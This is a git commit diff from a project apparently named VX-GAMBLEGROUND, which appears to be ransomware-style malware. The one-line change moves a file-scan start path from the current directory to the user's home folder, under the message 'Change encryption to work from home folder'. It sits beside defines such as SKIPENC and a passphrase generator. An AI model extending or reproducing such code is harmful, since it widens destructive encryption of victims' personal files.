diff options
| author | @syxhe <https://t.me/syxhe> | 2024-09-03 14:23:21 -0500 |
|---|---|---|
| committer | @syxhe <https://t.me/syxhe> | 2024-09-03 14:23:21 -0500 |
| commit | 3e2a45287d189be18c90f2e5e1ce49af08808e6d (patch) | |
| tree | 367ab235357284a0594599570adf07ad22bf6ea0 /src/VX-GAMBLEGROUND.h | |
| parent | 74f6e6577709d00306e336f5d824e01d7a107439 (diff) | |
Change encryption to work from home folder
Diffstat (limited to 'src/VX-GAMBLEGROUND.h')
| -rw-r--r-- | src/VX-GAMBLEGROUND.h | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/src/VX-GAMBLEGROUND.h b/src/VX-GAMBLEGROUND.h index 6d379c2..6c63f21 100644 --- a/src/VX-GAMBLEGROUND.h +++ b/src/VX-GAMBLEGROUND.h | |||
| @@ -12,7 +12,7 @@ struct arguments { | |||
| 12 | #define SKIPENC 0x2 | 12 | #define SKIPENC 0x2 |
| 13 | 13 | ||
| 14 | // This will later be changed to "~/" | 14 | // This will later be changed to "~/" |
| 15 | #define FILESCAN_START "./" | 15 | #define FILESCAN_START "~/" |
| 16 | 16 | ||
| 17 | #define PHRASESIZE 32 | 17 | #define PHRASESIZE 32 |
| 18 | int genphrase(char *phrase, size_t phrasesize); | 18 | int genphrase(char *phrase, size_t phrasesize); |
